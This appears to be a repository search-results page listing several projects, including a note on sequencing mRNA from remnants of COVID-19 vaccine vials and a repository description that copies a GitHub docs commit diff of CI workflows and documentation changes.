36 skills found · Page 1 of 2
NAalytics / Assemblies Of Putative SARS CoV2 Spike Encoding MRNA Sequences For Vaccines BNT 162b2 And MRNA 1273RNA vaccines have become a key tool in moving forward through the challenges raised both in the current pandemic and in numerous other public health and medical challenges. With the rollout of vaccines for COVID-19, these synthetic mRNAs have become broadly distributed RNA species in numerous human populations. Despite their ubiquity, sequences are not always available for such RNAs. Standard methods facilitate such sequencing. In this note, we provide experimental sequence information for the RNA components of the initial Moderna (https://pubmed.ncbi.nlm.nih.gov/32756549/) and Pfizer/BioNTech (https://pubmed.ncbi.nlm.nih.gov/33301246/) COVID-19 vaccines, allowing a working assembly of the former and a confirmation of previously reported sequence information for the latter RNA. Sharing of sequence information for broadly used therapeutics has the benefit of allowing any researchers or clinicians using sequencing approaches to rapidly identify such sequences as therapeutic-derived rather than host or infectious in origin. For this work, RNAs were obtained as discards from the small portions of vaccine doses that remained in vials after immunization; such portions would have been required to be otherwise discarded and were analyzed under FDA authorization for research use. To obtain the small amounts of RNA needed for characterization, vaccine remnants were phenol-chloroform extracted using TRIzol Reagent (Invitrogen), with intactness assessed by Agilent 2100 Bioanalyzer before and after extraction. Although our analysis mainly focused on RNAs obtained as soon as possible following discard, we also analyzed samples which had been refrigerated (~4 ℃) for up to 42 days with and without the addition of EDTA. Interestingly a substantial fraction of the RNA remained intact in these preparations. We note that the formulation of the vaccines includes numerous key chemical components which are quite possibly unstable under these conditions-- so these data certainly do not suggest that the vaccine as a biological agent is stable. But it is of interest that chemical stability of RNA itself is not sufficient to preclude eventual development of vaccines with a much less involved cold-chain storage and transportation. For further analysis, the initial RNAs were fragmented by heating to 94℃, primed with a random hexamer-tailed adaptor, amplified through a template-switch protocol (Takara SMARTerer Stranded RNA-seq kit), and sequenced using a MiSeq instrument (Illumina) with paired end 78-per end sequencing. As a reference material in specific assays, we included RNA of known concentration and sequence (from bacteriophage MS2). From these data, we obtained partial information on strandedness and a set of segments that could be used for assembly. This was particularly useful for the Moderna vaccine, for which the original vaccine RNA sequence was not available at the time our study was carried out. Contigs encoding full-length spikes were assembled from the Moderna and Pfizer datasets. The Pfizer/BioNTech data [Figure 1] verified the reported sequence for that vaccine (https://berthub.eu/articles/posts/reverse-engineering-source-code-of-the-biontech-pfizer-vaccine/), while the Moderna sequence [Figure 2] could not be checked against a published reference. RNA preparations lacking dsRNA are desirable in generating vaccine formulations as these will minimize an otherwise dramatic biological (and nonspecific) response that vertebrates have to double stranded character in RNA (https://www.nature.com/articles/nrd.2017.243). In the sequence data that we analyzed, we found that the vast majority of reads were from the expected sense strand. In addition, the minority of antisense reads appeared different from sense reads in lacking the characteristic extensions expected from the template switching protocol. Examining only the reads with an evident template switch (as an indicator for strand-of-origin), we observed that both vaccines overwhelmingly yielded sense reads (>99.99%). Independent sequencing assays and other experimental measurements are ongoing and will be needed to determine whether this template-switched sense read fraction in the SmarterSeq protocol indeed represents the actual dsRNA content in the original material. This work provides an initial assessment of two RNAs that are now a part of the human ecosystem and that are likely to appear in numerous other high throughput RNA-seq studies in which a fraction of the individuals may have previously been vaccinated. ProtoAcknowledgements: Thanks to our colleagues for help and suggestions (Nimit Jain, Emily Greenwald, Lamia Wahba, William Wang, Amisha Kumar, Sameer Sundrani, David Lipman, Bijoyita Roy). Figure 1: Spike-encoding contig assembled from BioNTech/Pfizer BNT-162b2 vaccine. Although the full coding region is included, the nature of the methodology used for sequencing and assembly is such that the assembled contig could lack some sequence from the ends of the RNA. Within the assembled sequence, this hypothetical sequence shows a perfect match to the corresponding sequence from documents available online derived from manufacturer communications with the World Health Organization [as reported by https://berthub.eu/articles/posts/reverse-engineering-source-code-of-the-biontech-pfizer-vaccine/]. The 5’ end for the assembly matches the start site noted in these documents, while the read-based assembly lacks an interrupted polyA tail (A30(GCATATGACT)A70) that is expected to be present in the mRNA.
OpenUserJS / OpenUserJS.orgThe home of FOSS user scripts.
microsoft / Qlib ServerQlib-Server is the data server system for Qlib. It enable Qlib to run in online mode. Under online mode, the data will be deployed as a shared data service. The data and their cache will be shared by all the clients. The data retrieval performance is expected to be improved due to a higher rate of cache hits. It will consume less disk space, too.
Sfedfcv / Redesigned PancakeSkip to content github / docs Code Issues 80 Pull requests 35 Discussions Actions Projects 2 Security Insights Merge branch 'main' into 1862-Add-Travis-CI-migration-table 1862-Add-Travis-CI-migration-table (#1869, Iixixi/ZachryTylerWood#102, THEBOLCK79/docs#1, sbnbhk/docs#1) @martin389 martin389 committed on Dec 9, 2020 2 parents 2f9ec0c + 1588f50 commit 1a56ed136914e522f3a23ecc2be1c49f479a1a6a Showing 501 changed files with 5,397 additions and 1,362 deletions. 2 .github/allowed-actions.js @@ -30,7 +30,7 @@ module.exports = [ 'rachmari/labeler@832d42ec5523f3c6d46e8168de71cd54363e3e2e', 'repo-sync/github-sync@3832fe8e2be32372e1b3970bbae8e7079edeec88', 'repo-sync/pull-request@33777245b1aace1a58c87a29c90321aa7a74bd7d', 'rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815', 'someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd', 'tjenkinson/gh-action-auto-merge-dependency-updates@cee2ac0', 'EndBug/add-and-commit@9358097a71ad9fb9e2f9624c6098c89193d83575' ] 72 .github/workflows/confirm-internal-staff-work-in-docs.yml @@ -0,0 +1,72 @@ name: Confirm internal staff meant to post in public on: issues: types: - opened - reopened - transferred pull_request_target: types: - opened - reopened jobs: check-team-membership: runs-on: ubuntu-latest continue-on-error: true if: github.repository == 'github/docs' steps: - uses: actions/github-script@626af12fe9a53dc2972b48385e7fe7dec79145c9 with: github-token: ${{ secrets.DOCUBOT_FR_PROJECT_BOARD_WORKFLOWS_REPO_ORG_READ_SCOPES }} script: | // Only perform this action with GitHub employees try { await github.teams.getMembershipForUserInOrg({ org: 'github', team_slug: 'employees', username: context.payload.sender.login, }); } catch(err) { // An error will be thrown if the user is not a GitHub employee // If a user is not a GitHub employee, we should stop here and // Not send a notification return } // Don't perform this action with Docs team members try { await github.teams.getMembershipForUserInOrg({ org: 'github', team_slug: 'docs', username: context.payload.sender.login, }); // If the user is a Docs team member, we should stop here and not send // a notification return } catch(err) { // An error will be thrown if the user is not a Docs team member // If a user is not a Docs team member we should continue and send // the notification } const issueNo = context.number || context.issue.number // Create an issue in our private repo await github.issues.create({ owner: 'github', repo: 'docs-internal', title: `@${context.payload.sender.login} confirm that \#${issueNo} should be in the public github/docs repo`, body: `@${context.payload.sender.login} opened https://github.com/github/docs/issues/${issueNo} publicly in the github/docs repo, instead of the private github/docs-internal repo.\n\n@${context.payload.sender.login}, please confirm that this belongs in the public repo and that no sensitive information was disclosed by commenting below and closing the issue.\n\nIf this was not intentional and sensitive information was shared, please delete https://github.com/github/docs/issues/${issueNo} and notify us in the \#docs-open-source channel.\n\nThanks! \n\n/cc @github/docs @github/docs-engineering` }); throw new Error('A Hubber opened an issue on the public github/docs repo'); - name: Send Slack notification if a GitHub employee who isn't on the docs team opens an issue in public if: ${{ failure() && github.repository == 'github/docs' }} uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd with: channel: ${{ secrets.DOCS_OPEN_SOURCE_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} text: <@${{github.actor}}> opened https://github.com/github/docs/issues/${{ github.event.number || github.event.issue.number }} publicly on the github/docs repo instead of the private github/docs-internal repo. They have been notified via a new issue in the github/docs-internal repo to confirm this was intentional. 15 .github/workflows/js-lint.yml @@ -10,23 +10,8 @@ on: - translations jobs: see_if_should_skip: runs-on: ubuntu-latest outputs: should_skip: ${{ steps.skip_check.outputs.should_skip }} steps: - id: skip_check uses: fkirc/skip-duplicate-actions@36feb0d8d062137530c2e00bd278d138fe191289 with: cancel_others: 'false' github_token: ${{ github.token }} paths: '["**/*.js", "package*.json", ".github/workflows/js-lint.yml", ".eslint*"]' lint: runs-on: ubuntu-latest needs: see_if_should_skip if: ${{ needs.see_if_should_skip.outputs.should_skip != 'true' }} steps: - name: Check out repo uses: actions/checkout@5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f 13 .github/workflows/repo-freeze-reminders.yml @@ -14,11 +14,10 @@ jobs: if: github.repository == 'github/docs-internal' steps: - name: Send Slack notification if repo is frozen uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: ${{ env.FREEZE == 'true' }} uses: rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815 env: SLACK_WEBHOOK: ${{ secrets.DOCS_ALERTS_SLACK_WEBHOOK }} SLACK_USERNAME: docs-repo-sync SLACK_ICON_EMOJI: ':freezing_face:' SLACK_COLOR: '#51A0D5' # Carolina Blue SLACK_MESSAGE: All repo-sync runs will fail for ${{ github.repository }} because the repo is currently frozen! with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: info text: All repo-sync runs will fail for ${{ github.repository }} because the repo is currently frozen! 54 .github/workflows/repo-sync-stalls.yml @@ -0,0 +1,54 @@ name: Repo Sync Stalls on: workflow_dispatch: schedule: - cron: '*/30 * * * *' jobs: check-freezer: name: Check for deployment freezes runs-on: ubuntu-latest steps: - name: Exit if repo is frozen if: ${{ env.FREEZE == 'true' }} run: | echo 'The repo is currently frozen! Exiting this workflow.' exit 1 # prevents further steps from running repo-sync-stalls: runs-on: ubuntu-latest steps: - name: Check if repo sync is stalled uses: actions/github-script@626af12fe9a53dc2972b48385e7fe7dec79145c9 with: github-token: ${{ secrets.DOCUBOT_FR_PROJECT_BOARD_WORKFLOWS_REPO_ORG_READ_SCOPES }} script: | let pulls; const owner = context.repo.owner const repo = context.repo.repo try { pulls = await github.pulls.list({ owner: owner, repo: repo, head: `${owner}:repo-sync`, state: 'open' }); } catch(err) { throw err return } pulls.data.forEach(pr => { const timeDelta = Date.now() - Date.parse(pr.created_at); const minutesOpen = timeDelta / 1000 / 60; if (minutesOpen > 30) { core.setFailed('Repo sync appears to be stalled') } }) - name: Send Slack notification if workflow fails uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: failure() with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: failure text: Repo sync appears to be stalled for ${{github.repository}}. See https://github.com/${{github.repository}}/pulls?q=is%3Apr+is%3Aopen+repo+sync 16 .github/workflows/repo-sync.yml @@ -7,6 +7,7 @@ name: Repo Sync on: workflow_dispatch: schedule: - cron: '*/15 * * * *' # every 15 minutes @@ -70,11 +71,10 @@ jobs: number: ${{ steps.find-pull-request.outputs.number }} - name: Send Slack notification if workflow fails uses: rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815 if: ${{ failure() }} env: SLACK_WEBHOOK: ${{ secrets.DOCS_ALERTS_SLACK_WEBHOOK }} SLACK_USERNAME: docs-repo-sync SLACK_ICON_EMOJI: ':ohno:' SLACK_COLOR: '#B90E0A' # Crimson SLACK_MESSAGE: The last repo-sync run for ${{github.repository}} failed. See https://github.com/${{github.repository}}/actions?query=workflow%3A%22Repo+Sync%22 uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: failure() with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: failure text: The last repo-sync run for ${{github.repository}} failed. See https://github.com/${{github.repository}}/actions?query=workflow%3A%22Repo+Sync%22 10 .github/workflows/sync-algolia-search-indices.yml @@ -33,8 +33,10 @@ jobs: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: npm run sync-search - name: Send slack notification if workflow run fails uses: rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815 uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: failure() env: SLACK_WEBHOOK: ${{ secrets.DOCS_ALERTS_SLACK_WEBHOOK }} SLACK_MESSAGE: The last Algolia workflow run for ${{github.repository}} failed. Search actions for `workflow:Algolia` with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: failure text: The last Algolia workflow run for ${{github.repository}} failed. Search actions for `workflow:Algolia` 15 .github/workflows/yml-lint.yml @@ -10,23 +10,8 @@ on: - translations jobs: see_if_should_skip: runs-on: ubuntu-latest outputs: should_skip: ${{ steps.skip_check.outputs.should_skip }} steps: - id: skip_check uses: fkirc/skip-duplicate-actions@36feb0d8d062137530c2e00bd278d138fe191289 with: cancel_others: 'false' github_token: ${{ github.token }} paths: '["**/*.yml", "**/*.yaml", "package*.json", ".github/workflows/yml-lint.yml"]' lint: runs-on: ubuntu-latest needs: see_if_should_skip if: ${{ needs.see_if_should_skip.outputs.should_skip != 'true' }} steps: - name: Check out repo uses: actions/checkout@5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f 4 README.md @@ -28,7 +28,7 @@ If you've found a problem, you can open an issue using a [template](https://gith #### Solve an issue If you have a solution to one of the open issues, you will need to fork the repository and submit a PR using the [template](https://github.com/github/docs/blob/main/CONTRIBUTING.md#pull-request-template) that is visible automatically in the pull request body. For more details about this process, please check out [Getting Started with Contributing](/CONTRIBUTING.md). If you have a solution to one of the open issues, you will need to fork the repository and submit a pull request using the [template](https://github.com/github/docs/blob/main/CONTRIBUTING.md#pull-request-template) that is visible automatically in the pull request body. For more details about this process, please check out [Getting Started with Contributing](/CONTRIBUTING.md). #### Join us in discussions @@ -50,6 +50,8 @@ There are a few more things to know when you're getting started with this repo: In addition to the README you're reading right now, this repo includes other READMEs that describe the purpose of each subdirectory in more detail: - [content/README.md](content/README.md) - [content/graphql/README.md](content/graphql/README.md) - [content/rest/README.md](content/rest/README.md) - [contributing/README.md](contributing/README.md) - [data/README.md](data/README.md) - [data/reusables/README.md](data/reusables/README.md) BIN +164 KB assets/images/help/classroom/assignment-group-hero.png Binary file not shown. BIN +75.5 KB assets/images/help/classroom/assignment-ide-go-grant-access-button.png Binary file not shown. BIN +175 KB assets/images/help/classroom/assignment-individual-hero.png Binary file not shown. BIN +27.6 KB assets/images/help/classroom/assignment-repository-ide-button-in-readme.png Binary file not shown. BIN +83.4 KB assets/images/help/classroom/assignments-assign-deadline.png Binary file not shown. BIN +32.4 KB assets/images/help/classroom/assignments-assignment-title.png Binary file not shown. BIN +27.7 KB assets/images/help/classroom/assignments-autograding-click-pencil-or-trash.png Binary file not shown. BIN +72 KB assets/images/help/classroom/assignments-choose-repository-visibility.png Binary file not shown. BIN +20.1 KB assets/images/help/classroom/assignments-click-continue-button.png Binary file not shown. BIN +23.7 KB assets/images/help/classroom/assignments-click-create-assignment-button.png Binary file not shown. BIN +76.4 KB assets/images/help/classroom/assignments-click-grading-and-feedback.png Binary file not shown. BIN +53.1 KB assets/images/help/classroom/assignments-click-new-assignment-button.png Binary file not shown. BIN +134 KB assets/images/help/classroom/assignments-click-online-ide.png Binary file not shown. BIN +77.8 KB assets/images/help/classroom/assignments-click-pencil.png Binary file not shown. BIN +18.8 KB assets/images/help/classroom/assignments-click-review-button.png Binary file not shown. BIN +20.6 KB assets/images/help/classroom/assignments-click-save-test-case-button.png Binary file not shown. BIN +121 KB assets/images/help/classroom/assignments-click-template-repository-in-list.png Binary file not shown. BIN +21.1 KB assets/images/help/classroom/assignments-click-update-assignment.png Binary file not shown. BIN +76.9 KB assets/images/help/classroom/assignments-click-view-ide.png Binary file not shown. BIN +96.5 KB assets/images/help/classroom/assignments-click-view-test.png Binary file not shown. BIN +71.3 KB assets/images/help/classroom/assignments-define-teams.png Binary file not shown. BIN +39.4 KB assets/images/help/classroom/assignments-enable-feedback-pull-requests.png Binary file not shown. BIN +40.4 KB assets/images/help/classroom/assignments-type-protected-file-paths.png Binary file not shown. BIN +330 KB assets/images/help/classroom/autograding-actions-logs.png Binary file not shown. BIN +187 KB assets/images/help/classroom/autograding-actions-tab.png Binary file not shown. BIN +94.9 KB assets/images/help/classroom/autograding-click-grading-method.png Diff not rendered. BIN +57.5 KB assets/images/help/classroom/autograding-click-pencil.png Diff not rendered. BIN +57.7 KB assets/images/help/classroom/autograding-click-trash.png Diff not rendered. BIN +168 KB assets/images/help/classroom/autograding-hero.png Diff not rendered. BIN +154 KB assets/images/help/classroom/classroom-add-students-to-your-roster.png Diff not rendered. BIN +166 KB assets/images/help/classroom/classroom-copy-credentials.png Diff not rendered. BIN +181 KB assets/images/help/classroom/classroom-hero.png Diff not rendered. BIN +48.3 KB assets/images/help/classroom/classroom-settings-click-connection-settings.png Diff not rendered. BIN +94 KB ...ges/help/classroom/classroom-settings-click-disconnect-from-your-lms-button.png Diff not rendered. BIN +148 KB assets/images/help/classroom/classroom-settings-click-lms.png Diff not rendered. BIN +149 KB assets/images/help/classroom/click-assignment-in-list.png Diff not rendered. BIN +52.3 KB assets/images/help/classroom/click-classroom-in-list.png Diff not rendered. BIN +49.5 KB assets/images/help/classroom/click-create-classroom-button.png Diff not rendered. BIN +30 KB assets/images/help/classroom/click-create-roster-button.png Diff not rendered. BIN +78.2 KB assets/images/help/classroom/click-delete-classroom-button.png Diff not rendered. BIN +60.8 KB ...images/help/classroom/click-import-from-a-learning-management-system-button.png Diff not rendered. BIN +51.9 KB assets/images/help/classroom/click-new-classroom-button.png Diff not rendered. BIN +83.4 KB assets/images/help/classroom/click-organization.png Diff not rendered. BIN +28.4 KB assets/images/help/classroom/click-settings.png Diff not rendered. BIN +29.7 KB assets/images/help/classroom/click-students.png Diff not rendered. BIN +60 KB assets/images/help/classroom/click-update-students-button.png Diff not rendered. BIN +127 KB assets/images/help/classroom/delete-classroom-click-delete-classroom-button.png Diff not rendered. BIN +104 KB assets/images/help/classroom/delete-classroom-modal-with-warning.png Diff not rendered. BIN +264 KB assets/images/help/classroom/ide-makecode-arcade-version-control-button.png Diff not rendered. BIN +69.4 KB assets/images/help/classroom/ide-replit-version-control-button.png Diff not rendered. BIN +234 KB assets/images/help/classroom/lms-github-classroom-credentials.png Diff not rendered. BIN +955 KB assets/images/help/classroom/probot-settings.gif Diff not rendered. BIN +113 KB assets/images/help/classroom/roster-hero.png Diff not rendered. BIN +40.4 KB assets/images/help/classroom/settings-click-rename-classroom-button.png Diff not rendered. BIN +41 KB assets/images/help/classroom/settings-type-classroom-name.png Diff not rendered. BIN +140 KB assets/images/help/classroom/setup-click-authorize-github-classroom.png Diff not rendered. BIN +102 KB assets/images/help/classroom/setup-click-authorize-github.png Diff not rendered. BIN +163 KB assets/images/help/classroom/setup-click-grant.png Diff not rendered. BIN +324 KB assets/images/help/classroom/students-click-delete-roster-button-in-modal.png Diff not rendered. BIN +91.1 KB assets/images/help/classroom/students-click-delete-roster-button.png Diff not rendered. BIN +48.2 KB assets/images/help/classroom/type-classroom-name.png Diff not rendered. BIN +174 KB assets/images/help/classroom/type-or-upload-student-identifiers.png Diff not rendered. BIN +83.3 KB assets/images/help/classroom/use-drop-down-then-click-archive.png Diff not rendered. BIN +45.2 KB assets/images/help/classroom/use-drop-down-then-click-unarchive.png Diff not rendered. BIN +55.4 KB assets/images/help/discussions/choose-new-category.png Diff not rendered. BIN +56.8 KB assets/images/help/discussions/click-delete-and-move-button.png Diff not rendered. BIN +59.7 KB assets/images/help/discussions/click-delete-discussion.png Diff not rendered. BIN +65.3 KB assets/images/help/discussions/click-delete-for-category.png Diff not rendered. BIN +68.9 KB assets/images/help/discussions/click-delete-this-discussion-button.png Diff not rendered. BIN +353 KB assets/images/help/discussions/click-discussion-in-list.png Diff not rendered. BIN +41 KB assets/images/help/discussions/click-edit-categories.png Diff not rendered. BIN +64.3 KB assets/images/help/discussions/click-edit-for-category.png Diff not rendered. BIN +60.2 KB assets/images/help/discussions/click-edit-pinned-discussion.png Diff not rendered. BIN +104 KB assets/images/help/discussions/click-new-category-button.png Diff not rendered. BIN +98.2 KB assets/images/help/discussions/click-pin-discussion-button.png Diff not rendered. BIN +55.7 KB assets/images/help/discussions/click-pin-discussion.png Diff not rendered. BIN +104 KB assets/images/help/discussions/click-save.png Diff not rendered. BIN +59.9 KB assets/images/help/discussions/click-transfer-discussion-button.png Diff not rendered. BIN +60.2 KB assets/images/help/discussions/click-transfer-discussion.png Diff not rendered. BIN +63.3 KB assets/images/help/discussions/click-unpin-discussion-button.png Diff not rendered. BIN +59.8 KB assets/images/help/discussions/click-unpin-discussion.png Diff not rendered. BIN +140 KB assets/images/help/discussions/comment-mark-as-answer-button.png Diff not rendered. BIN +136 KB assets/images/help/discussions/comment-marked-as-answer.png Diff not rendered. BIN +234 KB assets/images/help/discussions/customize-pinned-discussion.png Diff not rendered. BIN +1.21 MB assets/images/help/discussions/discussons-hero.png Diff not rendered. BIN +139 KB assets/images/help/discussions/edit-category-details.png Diff not rendered. BIN +136 KB assets/images/help/discussions/edit-existing-category-details.png Diff not rendered. BIN +55.5 KB assets/images/help/discussions/existing-category-click-save-changes-button.png Diff not rendered. BIN +680 KB assets/images/help/discussions/hero.png Diff not rendered. BIN +307 KB assets/images/help/discussions/most-helpful.png Diff not rendered. BIN +52.9 KB assets/images/help/discussions/new-category-click-create-button.png Diff not rendered. BIN +132 KB assets/images/help/discussions/new-discussion-button.png Diff not rendered. BIN +140 KB assets/images/help/discussions/new-discussion-select-category-dropdown-menu.png Diff not rendered. BIN +46.7 KB assets/images/help/discussions/new-discussion-start-discussion-button.png Diff not rendered. BIN +108 KB assets/images/help/discussions/new-discussion-title-and-body-fields.png Diff not rendered. BIN +23.1 KB assets/images/help/discussions/public-repo-settings.png Diff not rendered. BIN +49.5 KB assets/images/help/discussions/repository-discussions-tab.png Diff not rendered. BIN +51.8 KB assets/images/help/discussions/search-and-filter-controls.png Diff not rendered. BIN +44.4 KB assets/images/help/discussions/search-result.png Diff not rendered. BIN +35.4 KB assets/images/help/discussions/select-discussions-checkbox.png Diff not rendered. BIN +44.8 KB assets/images/help/discussions/setup-discussions-button.png Diff not rendered. BIN +95.9 KB assets/images/help/discussions/toggle-allow-users-with-read-access-checkbox.png Diff not rendered. BIN +73 KB assets/images/help/discussions/unanswered-discussion.png Diff not rendered. BIN +81.3 KB assets/images/help/discussions/use-choose-a-repository-drop-down.png Diff not rendered. BIN +30.3 KB assets/images/help/discussions/your-discussions.png Diff not rendered. BIN +563 KB assets/images/help/education/click-get-teacher-benefits.png Diff not rendered. BIN +116 KB assets/images/help/images/overview-actions-result-navigate.png Diff not rendered. BIN +150 KB assets/images/help/images/overview-actions-result-updated-2.png Diff not rendered. BIN +128 KB assets/images/help/images/workflow-graph-job.png Diff not rendered. BIN +135 KB assets/images/help/images/workflow-graph.png Diff not rendered. BIN +5.46 KB assets/images/help/organizations/update-profile-button.png Diff not rendered. BIN +44.6 KB assets/images/help/pull_requests/dependency-review-rich-diff.png Diff not rendered. BIN +24.6 KB assets/images/help/pull_requests/dependency-review-source-diff.png Diff not rendered. BIN +214 KB assets/images/help/pull_requests/dependency-review-vulnerability.png Diff not rendered. BIN +105 KB assets/images/help/pull_requests/file-filter-menu-json.png Diff not rendered. BIN +22.5 KB (510%) assets/images/help/pull_requests/pull-request-tabs-changed-files.png Diff not rendered. BIN +45.2 KB assets/images/help/repository/actions-delete-artifact-updated.png Diff not rendered. BIN +122 KB assets/images/help/repository/actions-failed-pester-test-updated.png Diff not rendered. BIN +45.4 KB assets/images/help/repository/artifact-drop-down-updated.png Diff not rendered. BIN +54.5 KB assets/images/help/repository/cancel-check-suite-updated.png Diff not rendered. BIN +120 KB assets/images/help/repository/copy-link-button-updated-2.png Diff not rendered. BIN +77.6 KB assets/images/help/repository/delete-all-logs-updated-2.png Diff not rendered. BIN +326 KB assets/images/help/repository/docker-action-workflow-run-updated.png Diff not rendered. BIN +84.6 KB assets/images/help/repository/download-logs-drop-down-updated-2.png Diff not rendered. BIN +170 KB assets/images/help/repository/in-progress-run.png Diff not rendered. BIN +124 KB assets/images/help/repository/javascript-action-workflow-run-updated-2.png Diff not rendered. BIN +116 KB assets/images/help/repository/passing-data-between-jobs-in-a-workflow-updated.png Diff not rendered. BIN +80.8 KB assets/images/help/repository/rerun-checks-drop-down-updated.png Diff not rendered. BIN +41.2 KB assets/images/help/repository/search-log-box-updated-2.png Diff not rendered. BIN +133 KB assets/images/help/repository/super-linter-workflow-results-updated-2.png Diff not rendered. BIN +97.5 KB assets/images/help/repository/superlinter-lint-code-base-job-updated.png Diff not rendered. BIN -128 KB assets/images/help/repository/upload-build-test-artifact.png Diff not rendered. BIN +27.5 KB (170%) assets/images/help/repository/view-run-billable-time.png Diff not rendered. BIN +54.8 KB assets/images/help/repository/workflow-run-kebab-horizontal-icon-updated-2.png Diff not rendered. BIN +7.54 KB assets/images/help/settings/appearance-tab.png Diff not rendered. BIN +39.7 KB assets/images/help/settings/theme-settings-radio-buttons.png Diff not rendered. BIN +11.1 KB assets/images/help/settings/update-theme-preference-button.png Diff not rendered. BIN +22.5 KB assets/images/help/sponsors/billing-account-switcher.png Diff not rendered. BIN +6.37 KB (150%) assets/images/help/sponsors/edit-sponsorship-payment-button.png Diff not rendered. BIN +34.8 KB assets/images/help/sponsors/link-account-button.png Diff not rendered. BIN +12.8 KB (170%) assets/images/help/sponsors/manage-your-sponsorship-button.png Diff not rendered. BIN +20.6 KB assets/images/help/sponsors/organization-update-email-textbox.png Diff not rendered. BIN +13.5 KB assets/images/help/sponsors/pay-prorated-amount-link.png Diff not rendered. BIN +34.7 KB assets/images/help/sponsors/select-an-account-drop-down.png Diff not rendered. BIN +17 KB assets/images/help/sponsors/sponsor-as-drop-down-menu.png Diff not rendered. BIN +15.8 KB assets/images/help/sponsors/sponsoring-as-drop-down-menu.png Diff not rendered. BIN +16.1 KB assets/images/help/sponsors/sponsoring-settings-button.png Diff not rendered. BIN +29.5 KB assets/images/help/sponsors/sponsoring-tab.png Diff not rendered. BIN +7.91 KB assets/images/help/sponsors/update-checkbox-manage.png Diff not rendered. BIN +43 KB (160%) assets/images/marketplace/marketplace-request-button.png Diff not rendered. BIN +53.6 KB assets/images/marketplace/marketplace_verified_creator_badges_apps.png Diff not rendered. 6 content/actions/creating-actions/creating-a-docker-container-action.md @@ -226,6 +226,10 @@ jobs: ``` {% endraw %} From your repository, click the **Actions** tab, and select the latest workflow run. You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. From your repository, click the **Actions** tab, and select the latest workflow run. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}Under **Jobs** or in the visualization graph, click **A job to say hello**. {% endif %}You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} 6 content/actions/creating-actions/creating-a-javascript-action.md @@ -261,9 +261,11 @@ jobs: ``` {% endraw %} From your repository, click the **Actions** tab, and select the latest workflow run. You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. From your repository, click the **Actions** tab, and select the latest workflow run. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}Under **Jobs** or in the visualization graph, click **A job to say hello**. {% endif %}You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% elsif currentVersion ver_gt "enterprise-server@2.22" %}  {% else %}  4 content/actions/guides/about-packaging-with-github-actions.md @@ -25,7 +25,11 @@ Creating a package at the end of a continuous integration workflow can help duri Now, when reviewing a pull request, you'll be able to look at the workflow run and download the artifact that was produced. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} This will let you run the code in the pull request on your machine, which can help with debugging or testing the pull request. 4 content/actions/guides/building-and-testing-powershell.md @@ -60,7 +60,11 @@ jobs: * `run: Test-Path resultsfile.log` - Check whether a file called `resultsfile.log` is present in the repository's root directory. * `Should -Be $true` - Uses Pester to define an expected result. If the result is unexpected, then {% data variables.product.prodname_actions %} flags this as a failed test. For example: {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} * `Invoke-Pester Unit.Tests.ps1 -Passthru` - Uses Pester to execute tests defined in a file called `Unit.Tests.ps1`. For example, to perform the same test described above, the `Unit.Tests.ps1` will contain the following: ``` 7 content/actions/guides/storing-workflow-data-as-artifacts.md @@ -108,8 +108,6 @@ jobs: path: output/test/code-coverage.html ```  {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} ### Configuring a custom artifact retention period @@ -238,7 +236,12 @@ jobs: echo The result is $value ``` The workflow run will archive any artifacts that it generated. For more information on downloading archived artifacts, see "[Downloading workflow artifacts](/actions/managing-workflow-runs/downloading-workflow-artifacts)." {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% if currentVersion == "free-pro-team@latest" %} 8 content/actions/index.md @@ -68,18 +68,18 @@ versions: <h2 class="mb-2 font-mktg h1">Code examples</h2> <div class="pr-lg-3 mb-5 mt-3"> <input class="js-code-example-filter input-lg py-2 px-3 col-12 col-lg-8 form-control" placeholder="Search code examples" type="search" autocomplete="off" aria-label="Search code examples"/> <input class="js-filter-card-filter input-lg 